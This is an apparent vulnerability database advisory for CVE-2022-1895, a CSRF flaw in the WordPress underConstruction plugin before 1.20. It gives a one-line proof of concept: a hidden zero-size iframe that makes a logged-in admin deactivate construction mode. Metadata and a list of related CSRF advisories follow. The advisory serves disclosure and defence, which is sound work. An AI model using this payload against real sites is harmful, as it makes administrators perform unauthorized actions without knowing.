underConstruction < 1.20 – Construction Mode Deactivation via CSRF | CVE 2022-1895 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when deactivating the construction mode, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Proof of Concept

<iframe src="http://example.com/wp-admin/index.php?page=under-construction&turnOffUnderConstructionMode" width="0" height="0" frameborder="0"></iframe>

Affects Plugins

underconstruction

Fixed in 1.20

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

bd9ef7e0-ebbb-4b91-8c58-265218a3c536

Timeline

Publicly Published

2022-05-26 (about 3 years ago)

Added

2022-05-26 (about 3 years ago)

Last Updated

2023-02-22 (about 2 years ago)

Other

Published

Title

Published

2024-11-01

Title

Mobilize <= 3.0.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-12-12

Title

Advanced Fancybox <= 1.1.1 - Cross-Site Request Forgery to Cross-Site Scripting

Published

2024-01-09

Title

Seraphinite Alternative Slugs Manager < 1.4 - Cross-Site Request Forgery

Published

2024-04-05

Title

Generate Child Theme < 2.0.1 - Cross-Site Request Forgery via process_create_form()

Published

2014-08-01

Title

Event Easy Calendar 1.0.0 - Multiple Administrator Action CSRF